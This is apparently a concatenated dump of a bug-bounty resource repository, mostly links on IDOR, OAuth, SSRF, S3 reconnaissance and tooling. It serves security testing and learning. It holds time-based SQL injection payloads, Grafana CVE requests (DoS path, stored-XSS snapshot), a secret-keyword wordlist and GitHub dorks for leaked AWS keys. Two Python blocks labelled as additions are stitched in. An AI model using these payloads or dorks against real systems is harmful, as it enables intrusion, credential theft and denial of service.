Overflow | Denial of Service with Cookie Bomb | DOM based Cookie Bomb ) 8 | https://blog.innerht.ml/overflow-trilogy/ 9 | 10 | ## Using Burp to Test Session Token Generation 11 | https://portswigger.net/support/using-burp-to-test-session-token-generation 12 | 13 | 14 | -------------------------------------------------------------------------------- /Account_Takeover.md: -------------------------------------------------------------------------------- 1 | ## Account Takeovers — Believe the Unbelievable 2 | https://infosecwriteups.com/account-takeovers-believe-the-unbelievable-bb98a0c251a4 3 | 4 | ## Account takeover using email changing feature 5 | ``` 6 | 1. evil@a.com changes mail to 2@gmail.com (owned) -> gets email verification link 7 | 2. sends link to victim, victim opens and victims account email is updated 8 | 9 | The reason is the token wasn't tied to session of user! 10 | ``` 11 | 12 | ## change victim’s password using IDN Homograph Attack 13 | https://infosecwriteups.com/how-i-was-able-to-change-victims-password-using-idn-homograph-attack-587111843aff 14 | 15 | ## 16 | https://medium.com/techiepedia/p5-to-p1-intresting-account-takeover-6e59b879494b 17 | 18 | -------------------------------------------------------------------------------- /Wordlist-List/Wordlist for Secret Find secret in js and github: -------------------------------------------------------------------------------- 1 | cloudinary:// 2 | CONFIG 3 | DB_NAME 4 | DB_USER 5 | DB_PASSWORD 6 | DB_HOST 7 | bucket name 8 | Jenkins 9 | OTP 10 | oauth 11 | authoriztion 12 | password 13 | pwd 14 | ftp 15 | dotfiles 16 | JDBC 17 | key-keys 18 | send_key-keys 19 | send,key-keys 20 | token 21 | user 22 | login-signin 23 | passkey-passkeys 24 | pass 25 | secret 26 | SecretAccessKey 27 | app_AWS_SECRET_ACCESS_KEY AWS_SECRET_ACCESS_KEY 28 | credentials 29 | config 30 | security_credentials 31 | connectionstring 32 | ssh2_auth_password 33 | aws_access_key 34 | aws_secret_key 35 | S3_BUCKET 36 | 
S3_ACCESS_KEY_ID 37 | S3_SECRET_ACCESS_KEY_ID 38 | S3_ENDPOINT 39 | AWS_ACCESS_KEY_ID 40 | list_aws_accounts 41 | SMTP password 42 | -------------------------------------------------------------------------------- /IDOR.md: -------------------------------------------------------------------------------- 1 | ## Here's a couple of things worth a try to get an IDOR 2 | https://threadreaderapp.com/thread/1464149386280144902.html 3 | 4 | ## IDOR through MongoDB Object IDs Prediction 5 | https://techkranti.com/idor-through-mongodb-object-ids-prediction/ 6 | 7 | ## How a simple IDOR become a $4K User Impersonation vulnerability 8 | https://shahmeeramir.com/how-a-simple-idor-become-a-4k-user-impersonation-vulnerability-705291b55c0d 9 | 10 | ## IDOR checklist 11 | https://www.notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b 12 | 13 | ## 14 | https://tech-blog.cymetrics.io/en/posts/huli/how-i-hacked-glints-and-your-resume-en/ 15 | 16 | ## 17 | https://github.com/muffyhub/Mindmaps/blob/main/IDOR%20Techniques.png 18 | 19 | 20 | -------------------------------------------------------------------------------- /SQL-Injection.md: -------------------------------------------------------------------------------- 1 | ## 1. SQL checklist 2 | 3 | https://www.notion.so/SQL-INJECTION-e89cf8a972d24a239821b4449f34f4e0 4 | 5 | 6 | ## 2. 
7 | https://sapt.medium.com/sqli-on-a-bugcrowd-private-program-17858b57ec61 8 | 9 | 10 | ``` 11 | ')) or sleep(5)=' 12 | ;waitfor delay '0:0:5'-- 13 | );waitfor delay '0:0:5'-- 14 | ';waitfor delay '0:0:5'-- 15 | ";waitfor delay '0:0:5'-- 16 | ');waitfor delay '0:0:5'-- 17 | ");waitfor delay '0:0:5'-- 18 | ));waitfor delay '0:0:5'-- 19 | ``` 20 | 21 | ## SQL Injection with FFUF and Sqlmap 22 | https://0xmahmoudjo0.medium.com/how-i-found-multiple-sql-injection-with-ffuf-and-sqlmap-in-a-few-minutes-9c3bb3780e8f 23 | 24 | ## Advanced sql injection cheat sheet 25 | https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet 26 | 27 | ## upload webshell using sql 28 | https://securityonline.info/sql-injection-rce/ 29 | 30 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /OAuth-Vulnerability.md: -------------------------------------------------------------------------------- 1 | ## 1. OAuth Checklist 2 | 3 | https://www.binarybrotherhood.io/oauth2_threat_model.html 4 | 5 | 6 | ## 2. OAuth Misconfiguration in small time-window of attack 7 | https://muhammad-aamir.medium.com/oauth-misconfiguration-found-in-small-time-window-of-attack-b585afcb94c6 8 | 9 | 10 | ## 3. 11 | https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1 12 | 13 | 14 | ## 4. Oauth checklist 15 | https://docs.google.com/presentation/d/1eu_b8jqrjr0OeetbrNHWPy9KCh8J1GEjuA4CeiRWokI/mobilepresent?slide=id.ga30804010b_0_0 16 | 17 | 18 | ## 5. Pre-Access to Victim’s Account via Facebook Signup 19 | https://akshanshjaiswal.medium.com/pre-access-to-victims-account-via-facebook-signup-60219e9e381d 20 | 21 | ## 6. 
Exploiting OAuth: Journey to Account Takeover 22 | https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /WriteUps.md: -------------------------------------------------------------------------------- 1 | ## 1. hackerone 2 | https://hackerone.com/hacktivity 3 | 4 | ## 2. Bugreader 5 | https://bugreader.com/reports 6 | 7 | ## 3. Hackerone Reports poc videos 8 | https://github.com/bminossi/AllVideoPocsFromHackerOne 9 | 10 | ## 4. Pentesrer land 11 | https://pentester.land/list-of-bug-bounty-writeups.html 12 | 13 | ## 5. Sillydaddy 14 | https://www.sillydaddy.me/ 15 | 16 | ## 6. 17 | https://cure53.de/#publications 18 | 19 | ## 20 | https://github.com/Mr-xn/Penetration_Testing_POC 21 | 22 | ## 23 | https://kuldeep.io/posts/120-days-of-high-frequency-hunting/#ac-in-reportspostsphp-leaking-pii 24 | 25 | ## 26 | https://www.agarri.fr/en/publications.html 27 | 28 | ## 29 | https://blog.securitybreached.org/2017/11/04/access-localhost-via-virtual-host-virtual-host-enumeration/ 30 | 31 | ## 32 | https://medium.com/manomano-tech/finding-zero-day-vulnerabilities-in-the-supply-chain-28afa43b0f6e 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /AWS-Pen-Testing.md: -------------------------------------------------------------------------------- 1 | ## Testing for unauthorized file uploads on misconfigured AWS S3 buckets 2 | https://alph4byt3.medium.com/testing-for-unauthorized-file-uploads-on-misconfigured-aws-s3-buckets-c114f7653893 3 | 4 | ## aws pentesting 5 | https://infosecwriteups.com/deep-dive-into-aws-penetration-testing-a99192a26898 6 | 7 | ## Bypassing and exploiting Bucket Upload Policies and Signed URLs 8 | https://labs.detectify.com/2018/08/02/bypassing-exploiting-bucket-upload-policies-signed-urls/ 9 | 10 | ## How To Scan AWS's Entire IP Range to Recon SSL Certificates 11 | 12 | 
https://www.daehee.com/scan-aws-ip-ssl-certificates/ 13 | 14 | 15 | ## Deep Dive into AWS Penetration Testing 16 | https://infosecwriteups.com/deep-dive-into-aws-penetration-testing-a99192a26898 17 | 18 | 19 | ## the-infamous-8kb-aws-waf-request-body-inspection-limitation 20 | https://kloudle.com/blog/the-infamous-8kb-aws-waf-request-body-inspection-limitation 21 | 22 | 23 | -------------------------------------------------------------------------------- /Wordlist.md: -------------------------------------------------------------------------------- 1 | ## 1.collection of wordlist 2 | https://github.com/heilla/SecurityTesting/blob/master/wordlists/Collection%20of%20wordlists.md 3 | 4 | ## 2. Dictionary list 5 | https://gist.github.com/mrofisr/5010dcb4321c99329c932aaeb3172a8a 6 | 7 | ## 3. Common speak wordlist 8 | https://github.com/pentester-io/commonspeak 9 | 10 | ## 4. AEM wordlist 11 | https://github.com/clarkvoss/AEM-List/blob/main/paths 12 | 13 | ## 5. Bug-Bounty-Wordlists 14 | https://github.com/Karanxa/Bug-Bounty-Wordlists 15 | 16 | ## 6. OneListForAll 17 | https://github.com/six2dez/OneListForAll/blob/main/onelistforallmicro.txt 18 | 19 | ## 7. Free, libre, effective, and data-driven wordlists for all! 20 | https://github.com/the-xentropy/samlists 21 | 22 | ## 8. wordlists for each versions of common web applications and content management systems (CMS) 23 | https://github.com/p0dalirius/webapp-wordlists 24 | 25 | ## 9. 26 | https://github.com/orwagodfather/WordList 27 | 28 | ## 10. Web Pentesting Fuzz dictionary, one is enough. 29 | https://github.com/TheKingOfDuck/fuzzDicts 30 | 31 | ## 11. 32 | https://github.com/p0dalirius/webapp-wordlists 33 | 34 | 35 | -------------------------------------------------------------------------------- /File-Upload.md: -------------------------------------------------------------------------------- 1 | ## 1. 2 | https://blog.yeswehack.com/yeswerhackers/exploitation/file-upload-attacks-part-1/ 3 | 4 | 5 | ## 2. 
6 | https://thevillagehacker.medium.com/remote-code-execution-due-to-unrestricted-file-upload-153be0009934 7 | 8 | ## 3. 9 | https://secgeek.net/bookfresh-vulnerability/ 10 | 11 | ## 4. 12 | https://infosecwriteups.com/bragging-rights-killing-file-uploads-softly-fba35a4e485a 13 | 14 | https://portswigger.net/kb/issues/00500980_file-upload-functionality 15 | 16 | https://labs.detectify.com/2015/05/28/building-an-xss-polyglot-through-swf-and-csp/ 17 | 18 | https://hackerone.com/reports/191380 19 | 20 | https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/mobilepresent?slide=id.ga2ef157b83_0_156 21 | 22 | ## Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator 23 | https://github.com/jonaslejon/malicious-pdf 24 | 25 | ## Image Upload Exploits 26 | https://github.com/barrracud4/image-upload-exploits 27 | 28 | 29 | ## Image upload bypass with magic byte 30 | https://danielxblack.ghost.io/bypassing-file-upload-restrictions-with-a-magic-byte-and-hex-editor/ 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /BugBounty-all-payload-Resource.md: -------------------------------------------------------------------------------- 1 | ## 1. All about bug bounty 2 | https://github.com/daffainfo/AllAboutBugBounty 3 | 4 | 5 | ## 2. bughunter-handbook 6 | https://gowthams.gitbook.io/bughunter-handbook/ 7 | 8 | ## 3. Swisskyrepo payloadsAllTheThings 9 | https://github.com/swisskyrepo/PayloadsAllTheThings 10 | 11 | ## 4. Another PayloadsAllTheThings 12 | https://github.com/s0wr0b1ndef/PayloadsAllTheThings 13 | 14 | ## 5. Hacktricks 15 | https://book.hacktricks.xyz/ 16 | 17 | ## 6 howtohunt gitbook 18 | https://kathan19.gitbook.io/howtohunt/ 19 | 20 | ## 7. Ippsec all tips 21 | https://ippsec.rocks/?# 22 | 23 | ## 8. Cves and all bugs payload 24 | https://github.com/daffainfo/AllAboutBugBounty 25 | 26 | ## 9. 
Havkerscrolls Tips 27 | https://github.com/hackerscrolls/SecurityTips 28 | 29 | ## 10. Web Attack Cheat Sheet 30 | https://github.com/riramar/Web-Attack-Cheat-Sheet 31 | 32 | ## 11. Collection of cheat sheets useful for pentesting 33 | https://github.com/coreb1t/awesome-pentest-cheat-sheets 34 | 35 | ## 12. Golden Guide for Pentesters 36 | https://github.com/0xCGonzalo/Golden-Guide-for-Pentesting 37 | 38 | ## 13. Resources & Disclosed Reports 39 | https://github.com/HolyBugx/HolyTips/tree/main/Resources#Recon 40 | 41 | ## 14. BBRE 42 | https://labs.bugbountyexplained.com/archive 43 | 44 | 45 | -------------------------------------------------------------------------------- /JS-analysis.md: -------------------------------------------------------------------------------- 1 | ## 1. Analysis of Client-Side JavaScript 2 | https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288 3 | 4 | ## 2. 5 | https://infosecwriteups.com/one-token-to-leak-them-all-the-story-of-a-8000-npm-token-79b13af182a3 6 | 7 | ## 3. linkfinder tool 8 | https://github.com/GerbenJavado/LinkFinder 9 | 10 | ## 4. Tool to Find js from a web 11 | https://github.com/robre/scripthunter 12 | 13 | ## 5. a javascript change monitoring tool 14 | https://github.com/robre/jsmon 15 | 16 | ## 6. Url teacking for changes 17 | https://github.com/ahussam/url-tracker 18 | 19 | ## 7.This is a command line tool I use when I want to get notified, on Telegram (on my phone), that something has finished running (on my laptop) 20 | https://github.com/ShutdownRepo/telegram-bot-cli 21 | 22 | ## 8. Static Analysis of Client-Side JavaScript 23 | https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288 24 | 25 | ## 9.JavaScript Enumeration for bug bounty hunters 26 | https://thehackerish.com/javascript-enumeration-for-bug-bounty-hunters/ 27 | 28 | ## 10. 
Javascript Files 29 | https://docs.google.com/presentation/d/18v_FXKm-HC3uaBotAoUDHTlOv40caA5WyvvupJRX5Uk/mobilepresent?slide=id.gaba040f84d_4_34 30 | 31 | 32 | -------------------------------------------------------------------------------- /Misc/Homoglyph.md: -------------------------------------------------------------------------------- 1 | ## Visual Spoofing 2 | https://websec.github.io/unicode-security-guide/visual-spoofing/ 3 | 4 | ## Homoglyph Attack Generator 5 | https://www.irongeek.com/homoglyph-attack-generator.php 6 | 7 | ``` 8 | 9 | Visual Spoofing attacks utilizes the characters from different languages that are visually similar. For example: These all letters [AΑ А ᗅ ᗋ ᴀ A] looks like 'A' of english, visually, however, the computer program processes these characters with their exact meanings. 10 | 11 | This is where it became an interesting tool to abuse the filters and regular expression based checks & bypass them. 12 | 13 | 14 | There are multiple attack scenarios using Visual Spoofing/Homographic Attacks: 15 | 16 | 1. Abusing the Filters & Bypassing Them 17 | 18 | - One can attempt to bypass filters for any attack category such as cross-site scripting and may have a successful execution. 19 | 20 | Ex: For example: <> tags are filters, you can try ‹› instead. (Looks visually similar but are different). 21 | 22 | 23 | 2. Domain Spoofing 24 | 25 | - Highly reliable while performing a social engineering attack. The phishing emails, websites, etc looks legit and genuine. 26 | 27 | 3. Business Logic Abuse 28 | - One can attempt to perform business logic abuse, break the parsing logics and even attempt to perform account takeovers. 29 | 30 | 4. IDN Homograph Attacks 31 | 32 | 5. And other endless misc. 
things one can think of (Being creative is always a plus) 33 | ``` 34 | 35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /S3_Recon.md: -------------------------------------------------------------------------------- 1 | # S3 RECON TIPS: 2 | 3 | ## Method 1: 4 | Use this google dorks for finding s3 bucket 5 | site: s3.amazonaws.com 6 | 7 | ## Method 2:Github Dorks 8 | By @hunter0x7, @GodfatherOrwa 9 | 10 | 11 | org:Target "bucket_name" 12 | org:Target "aws_access_key" 13 | org:Target "aws_secret_key" 14 | org:Target "S3_BUCKET" 15 | org:Target "S3_ACCESS_KEY_ID" 16 | org:Target "S3_SECRET_ACCESS_KEY" 17 | org:Target "S3_ENDPOINT" 18 | org:Target "AWS_ACCESS_KEY_ID" 19 | org:Target "list_aws_accounts" 20 | 21 | 22 | ## Method 3: 23 | You can use many online tools which are available on GitHub to find S3 bucket of a website. I would like to list down a few of them: 24 | 25 | 1) Slurp 26 | 2) Bucket_finder 27 | 3) S3Scanner 28 | 4) Lazy S3 29 | 5) S3 Bucket Finder 30 | 31 | Almost all tools are command-line tools, You have can clone them from GitHub. 32 | 33 | ## Method 4: 34 | Use the BURP Suite and spider the target web application. BURP Spider can extract the Amazon bucket of the target web application. 35 | 36 | ## Method 5: 37 | Right-click on any image of the target application and open image in new tab. If the image URL looks like this: 38 | http://xyz.s3.amazonaws.com/images/b1.gif 39 | 40 | It means the target application is storing their data to the Amazon server and the bucket name is “xyz”. Anything before “.s3” in the URL is the bucket name of the target application. 
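A defender-side check for the visual-spoofing problem described in the Homoglyph.md section above, added here as an example (it is not code from the original repository): it approximates the script of each letter from its Unicode character name, folds compatibility forms such as fullwidth letters with NFKC, maps a small hand-built confusable table (a constructed subset; the real Unicode confusables data is far larger) onto an ASCII "skeleton", and compares a new identifier against an existing one so that a registration spelled with a Cyrillic а collides with the real `admin`. The `script_of`, `skeleton`, `analyze` and `looks_like` names are this example's own.

```python
import unicodedata

# Constructed, deliberately small confusable map (the Unicode confusables.txt
# data is far larger); NFKC handles fullwidth/compatibility forms before this.
CONFUSABLES = {
    "\u0391": "A",  # GREEK CAPITAL LETTER ALPHA
    "\u0410": "A",  # CYRILLIC CAPITAL LETTER A
    "\u0430": "a",  # CYRILLIC SMALL LETTER A
    "\u0435": "e",  # CYRILLIC SMALL LETTER IE
    "\u043e": "o",  # CYRILLIC SMALL LETTER O
    "\u0440": "p",  # CYRILLIC SMALL LETTER ER
    "\u0441": "c",  # CYRILLIC SMALL LETTER ES
    "\u1d00": "A",  # LATIN LETTER SMALL CAPITAL A
    "\u2039": "<",  # SINGLE LEFT-POINTING ANGLE QUOTATION MARK
    "\u203a": ">",  # SINGLE RIGHT-POINTING ANGLE QUOTATION MARK
}


def script_of(ch: str) -> str:
    """Approximate a letter's script from the first word of its Unicode name
    ('LATIN', 'CYRILLIC', 'GREEK', 'CANADIAN', ...). Python's unicodedata has
    no Script property, so this is a heuristic, good enough for flagging."""
    name = unicodedata.name(ch, "")
    if name.startswith("FULLWIDTH "):
        name = name[len("FULLWIDTH "):]
    return name.split(" ")[0] if name else "UNKNOWN"


def skeleton(text: str) -> str:
    """Collapse text to an ASCII-leaning form used to compare look-alikes:
    NFKC first (fullwidth A -> A), then the confusable table."""
    folded = unicodedata.normalize("NFKC", text)
    return "".join(CONFUSABLES.get(ch, ch) for ch in folded)


def analyze(text: str) -> dict:
    """Report the scripts used by the letters, every non-ASCII code point with
    its name, and the skeleton. A single-script string can still be spoofed
    (fullwidth Latin), so callers should look at non_ascii as well."""
    scripts = {script_of(ch) for ch in text if ch.isalpha()}
    non_ascii = [(ch, f"U+{ord(ch):04X}", unicodedata.name(ch, "?"))
                 for ch in text if ord(ch) > 0x7F]
    return {
        "scripts": scripts,
        "mixed_script": len(scripts) > 1,
        "non_ascii": non_ascii,
        "skeleton": skeleton(text),
    }


def looks_like(candidate: str, existing: str) -> bool:
    """True when two distinct strings share a skeleton, i.e. the candidate
    visually impersonates an identifier that already exists."""
    return candidate != existing and skeleton(candidate) == skeleton(existing)


if __name__ == "__main__":
    # Constructed samples: plain Latin, Cyrillic a in a brand name, a
    # fullwidth A, and angle quotation marks standing in for < and >.
    for sample in ["paypal", "p\u0430ypal", "\uff21dmin", "\u2039script\u203a"]:
        print(repr(sample), analyze(sample))
    print(looks_like("\u0430dmin", "admin"))
```

Running `analyze` on an incoming username, display name or hostname and rejecting (or at least reviewing) anything that is mixed-script, carries unexpected non-ASCII code points, or whose skeleton matches an existing account covers the filter-bypass, domain-spoofing and business-logic cases listed above from the receiving side.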
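A small scanner for Method 5 (and for bucket hosts that surface in a Content-Security-Policy header), added here as an example rather than code from the repository, to run over your own application's responses when inventorying which buckets they reference. It pulls S3 bucket names out of any text, covering the virtual-hosted form the method shows (`bucket.s3.amazonaws.com`, with or without a region label) and, going beyond the text, the path-style form (`s3.<region>.amazonaws.com/bucket/...`). The sample body and header below are constructed, and `find_buckets` is this example's own name.

```python
import re

# Virtual-hosted style: <bucket>.s3[.<region>|-<region>].amazonaws.com
# Bucket names are 3-63 chars of lowercase letters, digits, dots and hyphens.
VIRTUAL_HOSTED = re.compile(
    r"([a-z0-9][a-z0-9.-]{1,61}[a-z0-9])\.s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com"
)
# Path style: s3[.<region>|-<region>].amazonaws.com/<bucket>/...
# The negative lookbehind stops this pattern from matching the *path* of a
# virtual-hosted URL (where "s3" is preceded by "<bucket>.").
PATH_STYLE = re.compile(
    r"(?<![a-z0-9.-])s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com/"
    r"([a-z0-9][a-z0-9.-]{1,61}[a-z0-9])"
)


def find_buckets(text: str):
    """Return sorted, de-duplicated (bucket, style) pairs found in text.
    Input is lowercased first: hostnames are case-insensitive and bucket
    names are lowercase by definition."""
    text = text.lower()
    found = set()
    for m in VIRTUAL_HOSTED.finditer(text):
        found.add((m.group(1), "virtual-hosted"))
    for m in PATH_STYLE.finditer(text):
        found.add((m.group(1), "path"))
    return sorted(found)


# Constructed sample response body: one virtual-hosted image URL (the Method 5
# case), one path-style script URL, and one non-S3 CDN URL that must be ignored.
SAMPLE_BODY = """<html><body>
<img src="http://xyz.s3.amazonaws.com/images/b1.gif">
<script src="https://s3.us-east-1.amazonaws.com/my-app-assets/app.js"></script>
<img src="https://cdn.example.com/logo.png">
</body></html>"""

# Constructed sample Content-Security-Policy header value with a regional host.
SAMPLE_CSP = ("default-src 'self'; "
              "img-src https://media-bucket.s3-eu-west-1.amazonaws.com")


if __name__ == "__main__":
    for label, blob in (("body", SAMPLE_BODY), ("csp", SAMPLE_CSP)):
        for bucket, style in find_buckets(blob):
            print(f"{label}: bucket={bucket} ({style})")
```

The lookbehind matters: without it the path-style pattern would report `images` as a bucket for the Method 5 URL, because `s3.amazonaws.com/images/` also matches that pattern.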
41 | 42 | ## Method 6: 43 | Sometimes you find Amazon bucket in Content-Security-Policy Response headers 44 | 45 | ## Method 7: 46 | Online Websites https://buckets.grayhatwarfare.com/ 47 | -------------------------------------------------------------------------------- /Technologies/Grafana.md: -------------------------------------------------------------------------------- 1 | # Grafana 2 | 1. CVE-2020-13379 (Denial of Service) 3 | ``` 4 | /avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D 5 | ``` 6 | 2. CVE-2020-11110 (Stored XSS) 7 | ``` 8 | POST /api/snapshots HTTP/1.1 9 | Host: 10 | Accept: application/json, text/plain, */* 11 | Accept-Language: en-US,en;q=0.5 12 | Referer: {{BaseURL}} 13 | content-type: application/json 14 | Connection: close 15 | 16 | {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0} 17 | ``` 18 | 3. 
CVE-2019-15043 (Grafana Unauthenticated API) 19 | ``` 20 | POST /api/snapshots HTTP/1.1 21 | Host: 22 | Connection: close 23 | Content-Length: 235 24 | Accept: */* 25 | Accept-Language: en 26 | Content-Type: application/json 27 | 28 | {"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600} 29 | ``` 30 | 4. Default Credentials 31 | ``` 32 | Try to login using admin as username and password 33 | ``` 34 | 5. Signup Enabled 35 | ``` 36 | /signup 37 | ``` 38 | 39 | ## Exploiting Grafana 40 | https://xmind.net/m/dVAZ8k/ 41 | 42 | 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /Reconnaissance.md: -------------------------------------------------------------------------------- 1 | ## 1. 2 | https://infosecwriteups.com/guide-to-basic-recon-bug-bounties-recon-728c5242a115 3 | 4 | ## 2. 5 | https://bendtheory.medium.com/finding-and-exploiting-unintended-functionality-in-main-web-app-apis-6eca3ef000af 6 | 7 | ## 3. 8 | https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html 9 | 10 | ## 4. 11 | https://thehackerish.com/owasp-top-10-the-ultimate-guide/ 12 | 13 | ## 5. Recon nahamsec 14 | https://docs.google.com/presentation/d/15bdwuAJKwhVwlcijKOXZFI5ZTJT1PdcMUblJVu6dJyU/mobilepresent?slide=id.gc7305a35cd_0_119 15 | 16 | ## 6. 17 | https://www.bugbountyhunter.com/mobile/tutorials-and-guides 18 | 19 | ## 7. Scope based Recon 20 | https://blog.cobalt.io/scope-based-recon-smart-recon-tactics-7e72d590eae5 21 | 22 | ## 8. Mind Map 23 | https://github.com/imran-parray/Mind-Maps 24 | 25 | ## 9. Github Recon 26 | https://orwaatyat.medium.com/your-full-map-to-github-recon-and-leaks-exposure-860c37ca2c82 27 | 28 | ## 10. Recon methodology by @xcheater 29 | https://infosecwriteups.com/recon-methodology-for-bug-hunting-e623120a7ca6 30 | 31 | ## 11. 
32 | https://docs.google.com/presentation/d/18o6fwqZB8wqHFYl2M5SO5KMzct8NKVW7G3edgi0XXJk/mobilepresent?slide=id.ge4fdf9c97a_0_316 33 | 34 | ## 12. Pentesterland 35 | https://pentester.land/cheatsheets/2019/04/15/recon-resources.html 36 | 37 | ## 13. Red team toolkit 38 | https://github.com/infosecn1nja/Red-Teaming-Toolkit 39 | 40 | ## 14. OSINT: Finding Email Passwords in Dumps with h8mail 41 | https://www.hackers-arise.com/post/osint-finding-email-passwords-in-dumps-with-h8mail 42 | 43 | ## 15. BigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial reconnaissance on the target organisation 44 | https://github.com/Viralmaniar/BigBountyRecon 45 | 46 | ## 16. “CI Knew There Would Be Bugs Here” — Exploring Continuous Integration Services as a Bug Bounty Hunter 47 | https://edoverflow.com/2019/ci-knew-there-would-be-bugs-here/ 48 | 49 | 50 | 51 | 52 | -------------------------------------------------------------------------------- /tools.md: -------------------------------------------------------------------------------- 1 | ## Subdomain Enum Tools 2 | * https://github.com/projectdiscovery/subfinder 3 | * https://github.com/OWASP/Amass 4 | * https://github.com/hannob/tlshelpers/blob/master/getsubdomain 5 | * https://github.com/tomnomnom/assetfinder 6 | 7 | ## Get Subdomains from IPs 8 | * https://github.com/SpiderLabs/HostHunter 9 | * https://github.com/infosec-au/altdns 10 | * https://github.com/ProjectAnte/dnsgen 11 | * https://github.com/blechschmidt/massdns 12 | 13 | 14 | ## Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl. 
15 | * https://github.com/lc/gau 16 | * 17 | 18 | 19 | ## Github Recon 20 | * https://github.com/techgaun/github-dorks 21 | * https://github.com/michenriksen/gitrob 22 | * https://github.com/eth0izzle/shhgit 23 | * https://github.com/anshumanbh/git-all-secrets 24 | * https://github.com/hisxo/gitGraber 25 | 26 | 27 | ## Get alerted if a new subdomain appears on the target 28 | * https://github.com/yassineaboukir/sublert 29 | * 30 | 31 | ## 1. Big bounty tools by m4ll0k 32 | https://github.com/m4ll0k/Bug-Bounty-Toolz 33 | 34 | ## hackingtool - All in One Hacking tool For Hackers 35 | https://hakin9.org/hackingtool-all-in-one-hacking-tool-for-hackers/ 36 | 37 | 38 | ## Web Hacker's Weapons / A collection of cool tools used by Web hackers. Happy hacking , Happy bug-hunting 39 | https://github.com/hahwul/WebHackersWeapons 40 | 41 | ## Awesome Bug Bounty Tools 42 | https://github.com/vavkamil/awesome-bugbounty-tools 43 | 44 | ## pocsuite3 is an open-sourced remote vulnerability testing framework 45 | https://github.com/knownsec/pocsuite3 46 | 47 | ## secretz, minimizing the large attack surface of Travis CI 48 | https://github.com/lc/secretz 49 | 50 | ## Generates combination of domain names from the provided input 51 | https://github.com/ProjectAnte/dnsgen 52 | 53 | ## An Adavnced Automation Tool For Web-Recon Developed For Linux Systems 54 | https://github.com/Cyber-Guy1/BlackDragon 55 | 56 | ## Remove duplicate urls from input 57 | https://github.com/nytr0gen/deduplicate 58 | 59 | ## Uniscan: An RFI, LFI, and RCE Vulnerability Scanner 60 | https://securitytrails.com/blog/uniscan 61 | 62 | ## Tool Finder 63 | https://inventory.raw.pm/ 64 | 65 | ## Uniscan: An RFI, LFI, and RCE Vulnerability Scanner 66 | https://securitytrails.com/blog/uniscan 67 | 68 | ## Malicious PDF Generator 69 | https://github.com/jonaslejon/malicious-pdf 70 | 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /SSRF.md: 
-------------------------------------------------------------------------------- 1 | ## 1. SSRF bible 2 | https://docs.google.com/document/u/0/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/mobilebasic#h.3ndar9ni0n0h 3 | 4 | 5 | ## 2. Tips and tricks for ssrf 6 | https://highon.coffee/blog/ssrf-cheat-sheet/#identifying-potential-locations-for-ssrf 7 | 8 | ## 3. SSRF payload in image upload 9 | ``` 10 | 11 | ``` 12 | 13 | ## 4. Bypass by redirect through own server 14 | https://infosecwriteups.com/an-exciting-journey-to-find-ssrf-bypass-cloudflare-and-extract-aws-metadata-fdb8be0b5f79 15 | 16 | 17 | ## 18 | https://d0nut.medium.com/piercing-the-veal-short-stories-to-read-with-friends-4aa86d606fc5 19 | 20 | 21 | ## SSRF Write-ups 22 | https://reconshell.com/awesome-ssrf-writeups/ 23 | 24 | ## how to find ssrf parameters with scant3r 25 | https://knassar702.github.io/scant3r-ssrf 26 | 27 | 28 | ## Simple SSRF Allows Access To Internal Assets 29 | https://coffeejunkie.me/Simple-SSRF/ 30 | 31 | ## On SSRF (Server Side Request Forgery) or Simple Stuff Rodolfo Found — Part I 32 | https://rodoassis.medium.com/on-ssrf-server-side-request-forgery-or-simple-stuff-rodolfo-found-part-i-4edf7ee75389 33 | 34 | ## Just Gopher It: Escalating a Blind SSRF to RCE for $15k — Yahoo Mail 35 | https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530 36 | 37 | ## How i found an SSRF in Yahoo! 
